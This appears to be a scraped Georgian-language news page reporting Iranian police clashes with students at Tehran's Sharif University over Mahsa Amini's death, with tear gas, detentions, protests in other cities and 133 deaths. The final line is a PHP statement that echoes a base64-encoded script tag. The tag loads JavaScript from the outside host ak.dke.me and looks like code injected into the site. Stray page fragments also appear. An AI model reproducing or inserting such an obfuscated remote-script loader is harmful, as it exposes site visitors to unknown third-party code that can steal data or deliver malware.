celsiusi
ავერსი შნაიდერი

ირანის პოლიციასა და სტუდენტებს შორის თეირანის შარიფის უნივერსიტეტთან დაპირისპირება მოხდა, – ამის შესახებ „როიტერი“ წერს. გავრცელებული ინფორმაციით, სტუდენტები 22 წლის მაჰსა ამინის გარდაცვალებას აპროტესტებენ.

დასავლური მედია წერს, რომ ტრადიციულად განსხვავებული აზრის კერა, შარიფის უნივერსიტეტი ათეულობით პოლიციელით არის გარშემორტყმული. ვრცელდება ინფორმაცია, რომ ირანის უსაფრთხოების ძალებმა სტუდენტების კამპუსიდან განდევნის მიზნით ცრემლსადენი გაზი გამოიყენეს. დაკავებულია რამდენიმე ათეული სტუდენტი.

საპროტესტო დემონსტრაციები თეირანის გარდა ასევე გაიმართა რამდენიმე ქალაქში, როგორიცაა: იაზდი, ქერმანშაჰი, სანანდაჯი, შირაზი და მეშჰედი. „დამოუკიდებლობა, თავისუფლება, სიკვდილი ხამენეის“ – სკანდირებდნენ აქციის მონაწილეები.

ბოლო ორი კვირის გამავლობაში ანტი-სამთავრობო აქციების მიმდინარეობისას 133 ადამიანი დაიღუპა.

454
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");